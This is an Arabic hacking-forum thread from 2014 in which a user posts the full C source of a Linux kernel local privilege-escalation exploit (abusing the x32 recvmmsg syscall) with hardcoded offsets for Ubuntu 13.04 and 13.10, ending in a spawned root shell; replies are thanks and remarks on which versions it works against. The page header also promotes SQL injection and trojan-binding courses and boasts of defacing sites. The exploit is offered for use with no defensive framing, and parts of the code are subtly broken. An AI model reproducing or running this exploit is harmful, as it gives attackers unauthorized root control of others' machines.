1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] Linux 3.4 Local Root Exploit

الموضوع في 'قسم الأدوات' بواسطة saudi-hack, بتاريخ ‏9 أكتوبر 2014.

كاتب الموضوع : saudi-hack المشاهدات : 321 الردود : 6 ‏9 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    saudi-hack
    Developer

    عضو منذ:
    ‏30 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته

    [​IMG]

    [PERL]#define _GNU_SOURCE
    #include <netinet/ip.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>
    #include <sys/syscall.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <sys/utsname.h>
    #define __X32_SYSCALL_BIT 0x40000000
    #undef __NR_recvmmsg
    #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
    #define VLEN 1
    #define BUFSIZE 200

    int port;

    struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
    };

    struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
    };

    void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
    while(s > 0) {
    fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
    sleep(1);
    s--;
    fprintf(stderr,".");
    }

    sockfd = socket(AF_INET,SOCK_DGRAM,0);
    bzero(&servaddr,sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
    servaddr.sin_port=htons(port);
    sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
    exit(0);
    }

    }

    void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
    fprintf(stderr,"not root, ya blew it!\n");
    exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
    }

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;

    // thx bliss
    static int __attribute__((regparm(3)))
    getroot(void *head, void * table)
    {
    commit_creds(prepare_kernel_cred(0));
    return -1;
    }

    void __attribute__((regparm(3)))
    trampoline()
    {
    asm("mov $getroot, %rax; call *%rax;");
    }

    int main(void)
    {
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    for(i=0;offsets.kernel_version != NULL;i++) {
    if(!strcmp(offsets.kernel_version,u.release)) {
    off = &offsets;
    break;
    }
    }

    if(!off) {
    fprintf(stderr,"no offsets for this kernel version..\n");
    exit(-1);
    }

    mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

    srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

    if(mmapped == -1) {
    perror("mmap()");
    exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
    perror("mprotect()");
    exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
    perror("socket()");
    exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
    perror("bind()");
    exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    for(i=0;i < 3 ;i++) {
    udp(i);
    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
    if(!retval) {
    fprintf(stderr,"\nrecvmmsg() failed\n");
    }
    }

    close(sockfd);

    fprintf(stderr,"\n");

    trigger();
    }[/PERL]

    ملاحظات : الاكسبلويت يعمل على تحديث 2013 ولم يتم تجربة 2014

    ملاحظة اخرى : النظام اوبنتو

     


    جاري تحميل الصفحة...
  2. غير متصل

    KhaLaF
    V • I • P

    عضو منذ:
    ‏13 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طـآلـب
    الإقامة:

    رد: Linux 3.4 Local Root Exploit

    يشر فنى ان اكوون أول رد مبدع والله
    الله يعطييك العآآفيه تقبـل م روو رى =)
     


  3. غير متصل

    saudi-hack
    Developer

    عضو منذ:
    ‏30 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: Linux 3.4 Local Root Exploit

    الله يعافيك نورت حبيبي :ُ{1e}:ُ
     


  4. غير متصل

    k!lwa s&rian ro0t Expert
    طاقم الإدارة

    عضو منذ:
    ‏3 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,236
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: Linux 3.4 Local Root Exploit

    مشكوووووووووووووور .. حلوة .. عاشت ايدك حبيبي ..

    هلا بأهل السعودية ارض ( عــــامر الفريدي ) و ( الدمار الشامــــل )

    من اقوى الهاكزر صراحة :))

    ولكن بالمناسبة مستحيل يعمل عال2014

    تقبل مروري ..


     


  5. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: Linux 3.4 Local Root Exploit

    عاشت ايدك
    ان شاء الله يفيد الاخوان
     


  6. غير متصل

    Mr.PRO
    rank
    Developer

    عضو منذ:
    ‏30 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: Linux 3.4 Local Root Exploit

    بارك الله فيكـ يالغالي .. [​IMG]
     


  7. غير متصل

    Th3 J0K3R
    rankrank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:

    رد: Linux 3.4 Local Root Exploit

    الله يبآرك فيك أخوُي
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...